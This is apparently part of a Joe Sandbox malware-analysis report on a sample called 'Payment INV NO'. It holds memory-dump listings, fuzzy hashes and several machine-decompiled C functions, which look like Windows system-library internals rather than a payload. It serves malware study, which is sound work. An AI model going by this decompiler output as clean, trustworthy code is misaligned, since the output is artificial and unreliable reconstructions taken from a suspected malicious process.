                                                          0x017cdee7
                                                          0x0180b456
                                                          0x0180b456
                                                          0x017cdeed
                                                          0x017cdeee
                                                          0x017cdef3
                                                          0x017cdef3
                                                          0x017cdef6
                                                          0x017cdefb
                                                          0x017cdf47
                                                          0x017cdf49
                                                          0x017cdf4a
                                                          0x017cdf4f
                                                          0x017cdf51
                                                          0x017cdf52
                                                          0x017cdf53
                                                          0x017cdf54
                                                          0x017cdf55
                                                          0x017cdf56
                                                          0x017cdf58
                                                          0x017cdf5d
                                                          0x017cdf63
                                                          0x017cdf77
                                                          0x017cdf7c
                                                          0x017cdfd3
                                                          0x017cdfd3
                                                          0x017cdf7e
                                                          0x017cdf81
                                                          0x017cdf86
                                                          0x017cdfda
                                                          0x017cdfdc
                                                          0x017cdfdd
                                                          0x017cdfe1
                                                          0x017cdfe7
                                                          0x017cdff0
                                                          0x017cdff5
                                                          0x017cdff8
                                                          0x017ce005
                                                          0x017ce00f
                                                          0x017ce010
                                                          0x017ce011
                                                          0x017ce014
                                                          0x017ce016
                                                          0x017ce018
                                                          0x017ce01c
                                                          0x017ce022
                                                          0x017ce028
                                                          0x017ce031
                                                          0x017ce036
                                                          0x0180b47d
                                                          0x0180b483
                                                          0x00000000
                                                          0x00000000
                                                          0x017ce03c
                                                          0x017ce03e
                                                          0x017ce043
                                                          0x017ce049
                                                          0x0180b489
                                                          0x0180b489
                                                          0x0180b48d
                                                          0x00000000
                                                          0x00000000
                                                          0x0180b493
                                                          0x00000000
                                                          0x017ce04f
                                                          0x017ce04f
                                                          0x017ce051
                                                          0x017ce054
                                                          0x017ce058
                                                          0x017ce05e
                                                          0x00000000
                                                          0x00000000
                                                          0x017ce064
                                                          0x017ce064
                                                          0x017ce067
                                                          0x017ce06a
                                                          0x017ce076
                                                          0x017ce079
                                                          0x017ce07f
                                                          0x0180b4cc
                                                          0x0180b4cc
                                                          0x00000000
                                                          0x017ce085
                                                          0x017ce085
                                                          0x017ce08a
                                                          0x017ce11c
                                                          0x017ce11f
                                                          0x017ce122
                                                          0x017ce127
                                                          0x017ce164
                                                          0x017ce129
                                                          0x017ce129
                                                          0x017ce12f
                                                          0x017ce12f
                                                          0x00000000
                                                          0x017ce090
                                                          0x017ce092
                                                          0x0180b4b2
                                                          0x0180b4b2
                                                          0x017ce09e
                                                          0x017ce0a0
                                                          0x017ce0a4
                                                          0x017ce0aa
                                                          0x0180b4d3
                                                          0x00000000
                                                          0x017ce0b0
                                                          0x017ce0b0
                                                          0x017ce0b5
                                                          0x017ce0b8
                                                          0x017ce0be
                                                          0x0180b4b9
                                                          0x0180b4c0
                                                          0x0180b4c3
                                                          0x0180b4c3
                                                          0x017ce0c4
                                                          0x017ce0c8
                                                          0x017ce0ca
                                                          0x017ce0cb
                                                          0x017ce0ce
                                                          0x017ce0ce
                                                          0x017ce0d3
                                                          0x00000000
                                                          0x017ce0d9
                                                          0x017ce0db
                                                          0x017ce0e1
                                                          0x017ce0e4
                                                          0x017ce0e4
                                                          0x017ce0ed
                                                          0x00000000
                                                          0x00000000
                                                          0x017ce0ed
                                                          0x017ce0d3
                                                          0x017ce0aa
                                                          0x017ce08a
                                                          0x00000000
                                                          0x017ce07f
                                                          0x017ce0f3
                                                          0x017ce0f9
                                                          0x017ce0fb
                                                          0x017ce0fb
                                                          0x017ce0fe
                                                          0x017ce101
                                                          0x017ce106
                                                          0x017ce108
                                                          0x017ce0fb
                                                          0x017ce111
                                                          0x017ce138
                                                          0x017ce13a
                                                          0x017ce13e
                                                          0x017ce148
                                                          0x017ce14e
                                                          0x017ce150
                                                          0x017ce156
                                                          0x00000000
                                                          0x00000000
                                                          0x017ce16c
                                                          0x017ce16c
                                                          0x017ce15a
                                                          0x017ce15d
                                                          0x017ce15d
                                                          0x017ce15a
                                                          0x00000000
                                                          0x0180b498
                                                          0x0180b498
                                                          0x0180b498
                                                          0x0180b49a
                                                          0x0180b49d
                                                          0x0180b4a0
                                                          0x00000000
                                                          0x0180b4a6
                                                          0x017ce04f
                                                          0x017ce049
                                                          0x00000000
                                                          0x017ce036
                                                          0x017ce028
                                                          0x017ce113
                                                          0x017ce119
                                                          0x017cdf88
                                                          0x017cdf88
                                                          0x017cdf8d
                                                          0x00000000
                                                          0x017cdf8f
                                                          0x017cdf8f
                                                          0x017cdf91
                                                          0x017cdf97
                                                          0x017cdf9a
                                                          0x017cdfa5
                                                          0x017cdfb0
                                                          0x017cdfb7
                                                          0x017cdfb9
                                                          0x017cdfbf
                                                          0x017cdfc4
                                                          0x017cdfc7
                                                          0x017cdfcc
                                                          0x017cdfcc
                                                          0x00000000
                                                          0x017cdfb7
                                                          0x017cdf8d
                                                          0x017cdf65
                                                          0x017cdf65
                                                          0x017cdf68
                                                          0x017cdf6b
                                                          0x017cdf6e
                                                          0x017cdf74
                                                          0x017cdf74
                                                          0x017cdefd
                                                          0x017cdefd
                                                          0x017cdf02
                                                          0x00000000
                                                          0x017cdf04
                                                          0x017cdf04
                                                          0x017cdf07
                                                          0x017cdf0a
                                                          0x017cdf13
                                                          0x0180b46e
                                                          0x0180b46e
                                                          0x017cdf25
                                                          0x00000000
                                                          0x017cdf25
                                                          0x017cdf02
                                                          0x017cdefb

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1b05de8e597f31e2416e52ee9763a88252185719f49ebb0419639c19493a9b05
                                                          • Instruction ID: cd5a2d4f86dc1fc55b714e7fffb49dc82f85b83e23677cb4214ef3348a0b669b
                                                          • Opcode Fuzzy Hash: 1b05de8e597f31e2416e52ee9763a88252185719f49ebb0419639c19493a9b05
                                                          • Instruction Fuzzy Hash: 5911C4721006469FD731AB78CC88F66F7ACEF81728B45466DE415CB29ADB30E545CAE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01799240 Relevance: .1, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 76%
                                                          			E01799240(void* __ebx, signed char __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				signed char _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x186f708);
				E017ED08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E017D95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E017D95D0();
				_t33 =  *0x18884c4; // 0x0
				E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x18884c4; // 0x0
				E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x18884c4; // 0x0
				E017B2280(E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x18886b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_push( *(_t66 + 0x14));
					E017D95D0();
					_push( *(_t66 + 0x10));
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E017D95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E01799325();
					_t50 =  *0x18884c4; // 0x0
					return E017ED0D1(E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                          0x01799240
                                                          0x01799242
                                                          0x01799247
                                                          0x0179924c
                                                          0x0179924e
                                                          0x01799255
                                                          0x01799257
                                                          0x0179925a
                                                          0x0179925f
                                                          0x0179925f
                                                          0x01799266
                                                          0x01799271
                                                          0x01799276
                                                          0x01799279
                                                          0x0179927e
                                                          0x01799295
                                                          0x0179929a
                                                          0x017992b1
                                                          0x017992b6
                                                          0x017992d7
                                                          0x017992dc
                                                          0x017992e0
                                                          0x017992e6
                                                          0x017992e8
                                                          0x017992ee
                                                          0x01799332
                                                          0x01799333
                                                          0x01799337
                                                          0x01799338
                                                          0x0179933a
                                                          0x0179933d
                                                          0x01799342
                                                          0x01799345
                                                          0x01799349
                                                          0x0179934e
                                                          0x01799352
                                                          0x01799357
                                                          0x017992f4
                                                          0x017992f4
                                                          0x017992f6
                                                          0x017992f9
                                                          0x01799300
                                                          0x01799306
                                                          0x01799324
                                                          0x01799324

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 492bd69b7702114647d6ad28b8e3f99dbaabc77301e5529c1d7d57b8f2427c8c
                                                          • Instruction ID: d020de011090d2a80f7e7115d333b4f744b09a074df35c4250901cb4b287a1a0
                                                          • Opcode Fuzzy Hash: 492bd69b7702114647d6ad28b8e3f99dbaabc77301e5529c1d7d57b8f2427c8c
                                                          • Instruction Fuzzy Hash: 3A215932041641DFC726EF68CA88F59F7F9FF18708F54456CE10A8A6A6CB34EA41CB44
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01793138 Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 80%
                                                          			E01793138(void* __ecx) {
				signed int _v8;
				char _v12;
				void* _t18;
				intOrPtr _t19;
				void* _t26;
				intOrPtr* _t28;
				char* _t32;
				intOrPtr* _t34;
				intOrPtr _t41;
				void* _t43;
				void* _t45;

				_push(__ecx);
				_push(__ecx);
				_t43 = __ecx;
				if(( *(__ecx + 0xc) & 0x00000001) != 0) {
					_t18 = 0;
				} else {
					_t34 = __ecx + 0x10;
					_t19 =  *_t34;
					_t28 =  *((intOrPtr*)(_t34 + 4));
					_t40 =  *((intOrPtr*)(_t19 + 4));
					if( *_t28 !=  *((intOrPtr*)(_t19 + 4)) ||  *_t28 != _t34) {
						_push(_t28);
						_push( *_t28);
						L0185A80D(0, 0xd, _t34, _t40);
					} else {
						 *_t28 = _t19;
						 *((intOrPtr*)(_t19 + 4)) = _t28;
					}
					_t41 =  *((intOrPtr*)(_t43 + 0x18));
					_v8 = _v8 & 0x00000000;
					_v12 =  *((intOrPtr*)(_t43 + 0x1c));
					_t45 = E017C174B( &_v12,  &_v8, 0x8000);
					if(E017B7D50() != 0) {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					} else {
						_t32 = 0x7ffe0388;
					}
					if( *_t32 != 0) {
						L0184FE3F(_t26, _t41, _v12, _v8);
					}
					_t18 = _t45;
				}
				return _t18;
			}














                                                          0x0179313d
                                                          0x0179313e
                                                          0x01793140
                                                          0x01793147
                                                          0x017931ac
                                                          0x01793149
                                                          0x01793149
                                                          0x0179314c
                                                          0x0179314e
                                                          0x01793151
                                                          0x01793156
                                                          0x017efdb3
                                                          0x017efdb4
                                                          0x017efdbd
                                                          0x01793164
                                                          0x01793164
                                                          0x01793166
                                                          0x01793166
                                                          0x0179316f
                                                          0x01793172
                                                          0x01793176
                                                          0x01793187
                                                          0x01793190
                                                          0x017efdd1
                                                          0x01793196
                                                          0x01793196
                                                          0x01793196
                                                          0x0179319e
                                                          0x017efde4
                                                          0x017efde4
                                                          0x017931a4
                                                          0x017931a4
                                                          0x017931ab

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 727f9142334497d01b4e8f9c5d335881560ed69f5c41f097bf0c518be13929f7
                                                          • Instruction ID: d41a6fc73e7007d1337bdd2b9f6dea3638c227bde094b8ac49d51f179537a1c9
                                                          • Opcode Fuzzy Hash: 727f9142334497d01b4e8f9c5d335881560ed69f5c41f097bf0c518be13929f7
                                                          • Instruction Fuzzy Hash: 3411D375600704EFDB25CF64D848F66FBF9FB85314F10859DE4018B651EB71A946CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017D90AF Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 82%
                                                          			E017D90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_v8 = __edx;
				_t70 = __ecx + 0x14c;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					if(L017ED4F0(_t72 + 0x10, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E017CE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = E017B4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E017DF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E017CA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                          0x017d90af
                                                          0x017d90b8
                                                          0x017d90bf
                                                          0x017d90c2
                                                          0x017d90c8
                                                          0x017d90cb
                                                          0x017d90cd
                                                          0x018114d7
                                                          0x018114eb
                                                          0x018114eb
                                                          0x00000000
                                                          0x018114eb
                                                          0x018114e6
                                                          0x00000000
                                                          0x018114f2
                                                          0x018114e8
                                                          0x00000000
                                                          0x018114e8
                                                          0x017d90d8
                                                          0x017d90da
                                                          0x017d90dd
                                                          0x017d90e5
                                                          0x00000000
                                                          0x017d9139
                                                          0x017d90fa
                                                          0x017d90fe
                                                          0x017d9142
                                                          0x00000000
                                                          0x017d9142
                                                          0x017d9104
                                                          0x017d9107
                                                          0x017d910b
                                                          0x017d9110
                                                          0x017d9118
                                                          0x017d9147
                                                          0x017d9148
                                                          0x017d914f
                                                          0x017d9150
                                                          0x017d9151
                                                          0x017d9152
                                                          0x017d9156
                                                          0x017d915d
                                                          0x017d9160
                                                          0x017d9168
                                                          0x017d916c
                                                          0x017d91bc
                                                          0x017d91be
                                                          0x00000000
                                                          0x017d91be
                                                          0x017d916e
                                                          0x017d9173
                                                          0x017d9176
                                                          0x00000000
                                                          0x00000000
                                                          0x017d917c
                                                          0x017d9180
                                                          0x017d91b5
                                                          0x00000000
                                                          0x017d91b5
                                                          0x017d9182
                                                          0x017d9185
                                                          0x017d9189
                                                          0x00000000
                                                          0x00000000
                                                          0x017d918e
                                                          0x017d9190
                                                          0x017d9198
                                                          0x00000000
                                                          0x00000000
                                                          0x017d91a0
                                                          0x00000000
                                                          0x017d91ad
                                                          0x017d91ad
                                                          0x017d91b0
                                                          0x017d91b1
                                                          0x00000000
                                                          0x017d9185
                                                          0x017d911a
                                                          0x017d911c
                                                          0x017d911f
                                                          0x017d9125
                                                          0x017d9127
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
